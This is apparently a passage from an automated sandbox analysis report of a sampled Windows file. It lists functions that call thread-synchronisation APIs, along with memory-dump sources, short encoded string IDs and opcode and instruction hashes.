                      • __Init_thread_footer.LIBCMT ref: 004084EE
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: G@ZK$[@G_
                      • API String ID: 2296764815-2338778587
                      • Opcode ID: 83c89cb96f0188348aa664fe5a3b9a2307e547b5dfc0b364f734f744eaf6d0b1
                      • Instruction ID: 2d9fbaa08c13fc83b2f5e0005e6d1fa5ae776f13101647786266d8808d8cc77d
                      • Opcode Fuzzy Hash: 83c89cb96f0188348aa664fe5a3b9a2307e547b5dfc0b364f734f744eaf6d0b1
                      • Instruction Fuzzy Hash: F501DB70F00285DFC710EBB9AD41969B7A0A719310BA1417EE526BB3D2EA79AC01CB4D
                      Function 00407E80 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 00407EEE
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: G@ZK$[@G_
                      • API String ID: 2296764815-2338778587
                      • Opcode ID: 9d937272391ced5062343f2fa694021c1e821d7a0b24c59750c86be7e58ed2ae
                      • Instruction ID: 86c78c31387f24dba649c5f85d45a7e4d1f1fe09f4149f0eb9c238fce71b3fdb
                      • Opcode Fuzzy Hash: 9d937272391ced5062343f2fa694021c1e821d7a0b24c59750c86be7e58ed2ae
                      • Instruction Fuzzy Hash: D601D6F0F05244DBD720DBA9AC41A6AB7B0AB09304F9005BAF51977792DA396C41CB49
                      Function 04947037 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 049470A0
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: ZF\KK.$three
                      • API String ID: 4132704954-2602870784
                      • Opcode ID: d97624d9c83104853a490e783dfff4d2631947f354aaa65fd626d83f5661df9f
                      • Instruction ID: 32f0fb0bbcc497bc16eab79356d9c0302661b9f5b6920db0582996432697a803
                      • Opcode Fuzzy Hash: d97624d9c83104853a490e783dfff4d2631947f354aaa65fd626d83f5661df9f
                      • Instruction Fuzzy Hash: 0801AD74F04208DBCB20DFF8E941F4DB3B0AB94314FA001BAD815A73A0D7346906DB19
                      Function 04947A97 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 04947B00
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: @G@K$A@K.
                      • API String ID: 4132704954-2457859030
                      • Opcode ID: a83cbf7a01367588a88915ca0a2ca858a472c895f782e2ee7495506aef916c1c
                      • Instruction ID: ae6e38a2d9a790e630d43c400321147d89a6ac1431e6e1726f08a19ab9d4445d
                      • Opcode Fuzzy Hash: a83cbf7a01367588a88915ca0a2ca858a472c895f782e2ee7495506aef916c1c
                      • Instruction Fuzzy Hash: 130181B4F40208DFC720DFA8E946E5DB7B0E788304FA001BAD916A7390D775AA458B59
                      Function 04947BA7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 04947C10
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: @G@K$ZYA.
                      • API String ID: 4132704954-4236202813
                      • Opcode ID: e0e011dd5bc5313defc92a44cb7491cb40592dbe2e3934c573b23a31aa141d8c
                      • Instruction ID: 9f387d827fc8b13cf67346f365b1805bc6b9ede67e1448d65a2eaf7ca2632e97
                      • Opcode Fuzzy Hash: e0e011dd5bc5313defc92a44cb7491cb40592dbe2e3934c573b23a31aa141d8c
                      • Instruction Fuzzy Hash: 6C01AD74F00208DFCB24EFA8E991A4DBBB0EB84310F9000BAD82557350D6757945CB49
                      Function 00407830 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 00407899
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: @G@K$A@K.
                      • API String ID: 2296764815-2457859030
                      • Opcode ID: 94f704d5fcaaa4a6a86cea28288e2267e04fc7853d895301023c40d4626a8c24
                      • Instruction ID: 02867bdc75deabfbdae8ac7f1914e191d6f0b036ba1bc0e64f50d331b9525a60
                      • Opcode Fuzzy Hash: 94f704d5fcaaa4a6a86cea28288e2267e04fc7853d895301023c40d4626a8c24
                      • Instruction Fuzzy Hash: 94016271F042049BC710DF58E946A58B7B0EB48304F60417BE906A7392D779AE418B5D
                      Function 00407940 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 004079A9
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: @G@K$ZYA.
                      • API String ID: 2296764815-4236202813
                      • Opcode ID: 2083bbc37204df75ae5e3194cbdbfa2277e554d398516f573e64da7e7003365e
                      • Instruction ID: d8be7bc43f2ac3a424769131d28bfe1308d6783f1b1820d008cdb8cd51ef09c0
                      • Opcode Fuzzy Hash: 2083bbc37204df75ae5e3194cbdbfa2277e554d398516f573e64da7e7003365e
                      • Instruction Fuzzy Hash: D3018174F04248DFCB24EFA8E992A5CBBB0AB04300F90417BE915A7392D6786D01CB5D
                      Function 00406DD0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 00406E39
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: ZF\K$three
                      • API String ID: 2296764815-3094064056
                      • Opcode ID: d0f8a07ab7cfa26798f6e4e5872bddee28ed568160f4df47330400ac7d4580cc
                      • Instruction ID: 29344792781c46cc919c6541bc41426b34b2da4dd82bbb0e7b349b67a9b0c42f
                      • Opcode Fuzzy Hash: d0f8a07ab7cfa26798f6e4e5872bddee28ed568160f4df47330400ac7d4580cc
                      • Instruction Fuzzy Hash: DF01D134F04204DBCB20DFA9E882B9CB3B0EB04314FA0017AED06A7391DA385D42DB4D
                      Function 04946EA7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 04946F00
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: CGV.$mix
                      • API String ID: 4132704954-1644454629
                      • Opcode ID: 5dae890d2176cd9c71f813253ec21c7a890b77e07cc8d6e19f72d9632b318c6d
                      • Instruction ID: d34299010a2d6706f61b62430f6ca4b715352e3984b3d41a14ebe1e696052168
                      • Opcode Fuzzy Hash: 5dae890d2176cd9c71f813253ec21c7a890b77e07cc8d6e19f72d9632b318c6d
                      • Instruction Fuzzy Hash: B7F096B4F44204DBDB10EFB8E942E5D77E0AB85314FE001B5E90697390D6357A458B59
                      Function 00406C40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 00406C99
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: CGV.$mix
                      • API String ID: 2296764815-1644454629
                      • Opcode ID: 748439c7c3e09b0f3fc712733e62b7b7dbd043bc03440ddc61534c02d70abd55
                      • Instruction ID: 24033b3836d6b4f620cd462d172ded2aeb793c2235c3ef6269eb5d899298d204
                      • Opcode Fuzzy Hash: 748439c7c3e09b0f3fc712733e62b7b7dbd043bc03440ddc61534c02d70abd55
                      • Instruction Fuzzy Hash: 2AF062B0F082049BDB10EBA9E982E5877A0AB45314FA4017AE906A77D2D6386D418B5D